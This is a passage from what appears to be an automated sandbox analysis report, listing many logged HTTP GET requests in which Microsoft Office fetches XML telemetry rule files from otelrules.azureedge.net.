                      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
